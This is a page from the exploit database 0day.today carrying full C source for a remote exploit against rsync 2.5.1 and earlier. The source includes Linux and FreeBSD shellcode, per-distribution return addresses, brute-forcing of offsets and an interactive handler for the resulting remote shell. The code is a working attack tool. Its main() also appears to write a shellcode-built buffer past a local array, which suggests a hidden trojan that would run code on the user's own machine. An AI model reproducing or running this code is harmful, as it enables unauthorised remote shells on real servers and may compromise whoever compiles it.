0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
rsync <= 2.5.1 Remote Exploit (2)
[=================================
rsync <= 2.5.1 Remote Exploit (2)
=================================
/* 7350rsync - rsync <= 2.5.1 remote exploit - x86 ver.
*
* current version 2.5.5 but bug was silently fixed it appears
* so vuln versions still ship, maybe security implemecations
* were not recognized.
*
* we can write NULL bites below &line[0] by supplying negative
* lengths. read_sbuf calls buf[len] = 0. standard NULL byte off
* by one kungf00 from there on.
*
* originally by 7350, dupshell/FreeBSD by sprinkles
*
*
*
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <netdb.h>
#include <errno.h>
#define MAXPATHLEN 4096
#define VERSION "@RSYNCD: 26\n"
#define PORT 873
#define NULL_OFFSET -48
#define STARTNULLBRUTE -44
#define ENDNULLBRUTE -56
#define BRUTEBASE 0xbfff7777
#define INCREMENT 512
#define ALLIGN 0 /* pop byte allignment */
#define SEND "uname -a; id\n"
int open_s(char *h, int p);
int setup(int s);
int exploit(int s);
void quit(int s); /* garbage quit */
void handleshell(int closeme, int s);
void usage(char *n);
char linux_port[] = /* x86 linux portshell 30464 */
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
"\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
"\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
"\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
"\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
"\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
"\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
"\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";
char linux_dup[] = /* x86 linux dupshell */
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\xcd\x80\x85\xc0\x74\x05\x93"
"\x31\xdb\xcd\x80\xb0\x42\xcd\x80\x31\xc0\xb0\x06\x31\xdb\xb3\x03"
"\x50\xcd\x80\x58\x4b\x79\xf9\xb0\x30\x43\xb3\x0f\x31\xc9\x41\x50"
"\xcd\x80\x58\x80\xe3\x03\x4b\x75\xf6\x43\xb0\x66\x89\xe1\x50\xcd"
"\x80\x92\x43\x6a\x10\x8d\x7c\x24\x04\x57\x52\xb8\x02\xff\x0b\x1a"
"\xfe\xc4\xab\x31\xc0\xab\xb0\x66\x89\xe1\x50\xcd\x80\x85\xc0\x78"
"\x4e\x58\xb3\x04\x6a\x05\x52\x89\xe1\x50\xcd\x80\x31\xc0\xb0\x06"
"\xcd\x80\x58\x31\xdb\xb0\x66\xb3\x05\x31\xc9\x51\x51\x52\x89\xe1"
"\x50\xcd\x80\x85\xc0\x78\x28\x93\x31\xc0\x40\x40\xcd\x80\x85\xc0"
"\x75\xda\x87\xda\xb0\x06\xcd\x80\x87\xda\xb0\x29\xcd\x80\xb0\x29"
"\xcd\x80\x31\xc0\xb0\x06\x31\xdb\xb3\x03\xcd\x80\x58\xeb\x1d\x31"
"\xc0\x31\xdb\x40\xcd\x80\x5b\x31\xc0\x88\x43\x07\x8d\x4b\x08\x89"
"\x19\x89\x41\x04\xb0\x0b\x31\xd2\xcd\x80\xeb\xe3\xe8\xe5\xff\xff"
"\xff/bin/sh";
char freebsd_port[] = /* x86 FreeBSD portshell 30464 */
"\x31\xc0\x40\x40\xcd\x80\x85\xc0\x74\x16\xeb\x60\x5e\x56\x31\xc9"
"\xb1\x10\x89\xf7\xad\x35\xc0\x8a\xc0\x8a\xab\xe2\xf7\x5e\xeb\x4e"
"\xe8\xe7\xff\xff\xff\x95\xd9\x85\xd8\xe0\xf2\xe0\xf2\xe0\xf2\xe0"
"\xf2\xcd\x80\x8e\xc3\x83\xc1\xe0\xcf\xf0\xcc\xcd\x80\x8d\xc5\x84"
"\xcf\xe0\xcf\xf0\xcc\xe0\xb0\xed\xf2\xcd\x80\x8a\xc5\x89\xc4\xe0"
"\xa9\xf0\xf2\x85\xc5\x86\xaa\xa4\xff\xa4\xef\xcd\x80\x91\xdf\x89"
"\xde\xcd\x80\x85\xc0\x31\xc0\x40\x31\xdb\xcd\x80\xeb\x7c\x89\xe7"
"\x31\xdb\x43\x31\xc0\x50\x40\x50\x40\x50\xb0\x66\x89\xe1\x50\xcd"
"\x80\x92\x58\x5b\x5b\x5b\xb3\x03\x6a\x10\x57\x52\x50\xb8\x02\xff"
"\x1a\x0b\xfe\xc4\xab\xb8\xd8\x28\xf4\x7d\xab\x58\xcd\x80\x5b\x58"
"\x58\xb0\x04\x89\xf1\x31\xd2\xb2\x18\x01\xd6\xcd\x80\x31\xd2\xb2"
"\xff\x31\xc0\xb0\x03\x89\xe1\xcd\x80\x85\xc0\x76\xa8\x81\x39\x50"
"\x49\x4e\x47\x74\x06\x41\x48\x75\xf4\xeb\xe6\x89\xcf\x47\xc6\x07"
"\x4f\x87\xf7\xac\x3c\x0a\x75\xfb\x87\xfe\x91\xb1\x26\xf3\xa4\x91"
"\xb0\x04\x89\xfa\x29\xca\xcd\x80\xeb\xc3";
struct x_info {
char *h;
int p;
char *module;
int null_offset;
u_long brutebase;
int shell;
int checkvuln;
int nullbrute;
int allign;
} rsx;
struct {
char *desc; /* description */
int retdist;
unsigned int retaddr; /* return address */
char *shell;
} targets[] = {
{ "Linux Redhat 7.0 x86 / rsync 2.5.0", -0x1f0, 0x80e1d0, linux_port },
{ "Linux Redhat 7.0 x86 / rsync 2.5.1", -0x1f0, 0x80e23c, linux_dup },
{ "Linux Redhat 7.1 x86 / rsync 2.5.0", -0x1f0, 0x80e1c4, linux_port },
{ "Linux Redhat 7.1 x86 / rsync 2.5.1", -0x1f0, 0x80e230, linux_dup },
{ "Linux Redhat 7.2 x86 / rsync 2.5.0", -0x1f0, 0x80e1b8, linux_port },
{ "Linux Redhat 7.2 x86 / rsync 2.5.1", -0x1f0, 0x80e22c, linux_dup },
{ "Linux Mandrake 8.0 x86 / rsync 2.5.0", -0x1f0, 0x80e3a4, linux_port },
{ "Linux Mandrake 8.0 x86 / rsync 2.5.1", -0x1f0, 0x80e428, linux_dup },
{ "FreeBSD 4.2 x86 / rsync 2.5.0", -0x86, 0x80a248, freebsd_port },
{ "FreeBSD 4.2 x86 / rsync 2.5.1", -0x86, 0x80a29c, freebsd_port },
{ "FreeBSD 4.3 x86 / rsync 2.5.0", -0x86, 0x80a254, freebsd_port },
{ "FreeBSD 4.3 x86 / rsync 2.5.1", -0x86, 0x80a2a0, freebsd_port },
{ "FreeBSD 4.4 x86 / rsync 2.5.0", -0x86, 0x80a278, freebsd_port },
{ "FreeBSD 4.4 x86 / rsync 2.5.1", -0x86, 0x80a2b4, freebsd_port },
{ "FreeBSD 4.5 x86 / rsync 2.5.0", -0x86, 0x80a28c, freebsd_port },
{ "FreeBSD 4.5 x86 / rsync 2.5.1", -0x86, 0x80a2dc, freebsd_port },
}, *victim;
int
main(int argc, char **argv)
{
int pipa[2];
char c;
int s,r;
char buf[1024];
char **p;
u_long store;
fprintf(stderr, "7350rsync - rsync <= 2.5.1 remote exploit - x86 ver.\n"
"-sc\n"
"\n");
p = ((char **)targets) + 35;
rsx.p = PORT;
rsx.null_offset = NULL_OFFSET;
rsx.brutebase = BRUTEBASE;
rsx.nullbrute = 0;
rsx.allign = ALLIGN;
strcpy(buf, *p);
p -= 4;
strcat(buf, *p);
pipa[2] = (int)buf;
pipa[3] = (int)buf;
if(argc == 1) { usage(argv[0]); return 0; }
while((c = getopt(argc, argv, "h:p:m:d:r:t:")) != EOF) {
switch(c) {
case 'h':
rsx.h = optarg;
break;
case 'p':
rsx.p = atoi(optarg);
break;
case 'm':
rsx.module = optarg;
break;
case 'd':
rsx.null_offset = atoi(optarg);
break;
case 'r':
rsx.brutebase = strtoul(optarg, (char **)optarg+strlen(optarg), 16);
break;
case 't':
if(atoi(optarg) < 1 || atoi(optarg) > sizeof(targets) / sizeof(targets[0]))
usage(argv[0]);
victim = &targets[atoi(optarg) - 1];
break;
default:
usage(argv[0]);
return 0;
}
}
if(optind == argc)
{ usage(argv[0]); return 0; }
rsx.h = argv[optind++];
/* NULL byte brute wrap */
store = rsx.brutebase;
if(rsx.nullbrute)
for(rsx.null_offset = STARTNULLBRUTE; rsx.null_offset >= ENDNULLBRUTE; rsx.null_offset--) {
fprintf(stderr, "\noffset: %d\n", rsx.null_offset);
/* start run -- cuten this up with some connectback shellcode */
for(rsx.checkvuln = 1; rsx.brutebase <= 0xbfffffff; rsx.brutebase += INCREMENT) {
if((s = open_s(rsx.h, rsx.p)) < 0) {
fprintf(stderr, "poop..bye\n");
return 1;
}
if((r = setup(s)) > 0)
{
if((r = exploit(s)) > 0)
handleshell(s, rsx.shell);
}
else
return 1;
}
rsx.brutebase = store;
}
for(rsx.checkvuln = 1; rsx.brutebase <= 0xbfffffff; rsx.brutebase += INCREMENT) {
if((s = open_s(rsx.h, rsx.p)) < 0) {
fprintf(stderr, "poop..bye\n");
return 1;
}
if((r = setup(s)) > 0)
{
if(exploit(s) > 0)
handleshell(s, rsx.shell);
}
else
return 1;
}
fprintf(stderr, "No luck...bye\n");
return 1;
}
void
quit(int s)
{
/* we just write a garbage quit to make the remote end the process */
/* very crude but who cares */
write(s, "QUIT\n", 5);
close(s);
}
int
setup(int s)
{
/* we just dump our setup info on the socket. kludge */
char out[512], *check;
long version = 0;
if(rsx.checkvuln) {
rsx.checkvuln = 0; /* just check once */
/* get version reply -- vuln check */
memset(out, '\0', sizeof(out));
read(s, out, sizeof(out)-1);
if((check = strchr(out, (int)':')) != NULL) {
version = strtoul((char *)check+1, (char **)check+3, 0);
if(version >= 26) {
fprintf(stderr, "target is not vulnerable (version: %lu)\n", version);
return -1;
}
}
else {
fprintf(stderr, "did not get version reply..aborting\n");
quit(s);
return -1;
}
fprintf(stderr, "Target appears to be vulnerable..continue attack\n");
}
/* our version string */
if(write(s, VERSION, strlen(VERSION)) < 0) return -1;
/* the module we supposedly want to retrieve */
memset(out, '\0', sizeof(out));
snprintf(out, sizeof(out)-1, "%s\n", rsx.module);
if(write(s, out, strlen(out)) < 0) return -1;
if(write(s, "--server\n", 9) < 0) return -1;
if(write(s, "--sender\n", 9) < 0) return -1;
if(write(s, ".\n", 2) < 0) return -1;
/* send module name once more */
if(write(s, out, strlen(out)) < 0) return -1;
/* send newline */
if(write(s, "\n", 1) < 0) return -1;
return 1;
}
int
exploit(int s)
{
char x_buf[MAXPATHLEN], b[4];
int i;
/* sleep(15); */
memset(x_buf, 0x90, ((MAXPATHLEN/2)-strlen(victim->shell)));
memcpy(x_buf+((MAXPATHLEN/2)-strlen(victim->shell)), victim->shell, strlen(victim->shell));
/* allign our address bytes for the pop if needed */
for(i=(MAXPATHLEN/2); i<((MAXPATHLEN/2)+rsx.allign);i++)
x_buf[i] = 'x';
for(i=((MAXPATHLEN/2)+rsx.allign); i<MAXPATHLEN; i+=4)
*(long *)&x_buf[i] = rsx.brutebase;
*(int *)&b[0] = (MAXPATHLEN-1);
if(write(s, b, 4) < 0) return -1;
if(write(s, x_buf, (MAXPATHLEN-1)) < 0) return -1;
/* send NULL byte offset from &line[0] to read_sbuf() ebp */
*(int *)&b[0] = rsx.null_offset;
if(write(s, b, 4) < 0) return -1;
/* let rsync know it can go ahead and own itself now */
memset(b, '\0', 4);
if(write(s, b, 4) < 0) return -1;
/* zzz for shell setup */
usleep(50000);
/* check for our shell -- (mod this to be connectback friendly bruteforce) */
fprintf(stderr, ";");
if((rsx.shell = open_s(rsx.h, 30464)) < 0) {
if(rand() % 2)
fprintf(stderr, "P");
else
fprintf(stderr, "p");
quit(s);
return -1;
}
fprintf(stderr, "\n\nSuccess! (ret: %08x offset: %d)\n\n", (int)rsx.brutebase, rsx.null_offset);
return 1;
}
void
usage(char *n) {
int i;
fprintf(stderr, "usage: %s [options] <hostname>\n"
"\nOptions:\n"
"\t-m module\tmodule to request\n"
"\t-p port\t\tport connecting to (default: 873)\n"
"\t-d dist\t\tret - buf distance\n"
"\t-r ret\t\treturn address\n"
"\t-t target\tselect target\n", n);
for(i = 0; i < sizeof(targets) / sizeof(targets[0]); i++)
fprintf(stderr, "\t\t\t(%u) %s, %d, %08x\n", i + 1, targets[i].desc, targets[i].retdist, targets[i].retaddr);
}
int
open_s(char *h, int p)
{
struct sockaddr_in remote;
struct hostent *iplookup;
char *ipaddress;
int sfd;
if((iplookup = gethostbyname(h)) == NULL) {
perror("gethostbyname");
return -1;
}
ipaddress = (char *)inet_ntoa(*((struct in_addr *)iplookup->h_addr));
sfd = socket(AF_INET, SOCK_STREAM, 0);
remote.sin_family = AF_INET;
remote.sin_addr.s_addr = inet_addr(ipaddress);
remote.sin_port = htons(p);
memset(&(remote.sin_zero), '\0', 8);
if(connect(sfd, (struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) return -1;
return sfd;
}
void
handleshell(int closeme, int s)
{
char in[512], out[512];
fd_set fdset;
close(closeme);
if(write(s, SEND, strlen(SEND)) < 0 ) {
fprintf(stderr, "write error\n");
return;
}
while(1) {
FD_ZERO(&fdset);
FD_SET(fileno(stdin), &fdset);
FD_SET(s, &fdset);
select(s+1, &fdset, NULL, NULL, NULL);
if(FD_ISSET(fileno(stdin), &fdset)) {
memset(out, '\0', sizeof(out));
if(read(0, out, (sizeof(out)-1)) < 0) {
fprintf(stderr, "read error\n");
exit(1);
}
if(!strncmp(out, "exit", 4)) {
write(s, out, strlen(out));
quit(s);
exit(0);
}
if(write(s, out, strlen(out)) < 0) {
fprintf(stderr, "write error\n");
exit(1);
}
}
if(FD_ISSET(s, &fdset)) {
memset(in, '\0', sizeof(in));
if(read(s, in, (sizeof(in)-1)) < 0) {
fprintf(stderr, "read error\n");
exit(1);
}
fprintf(stderr, "%s", in);
}
}
}
# 0day.today [2024-11-16] #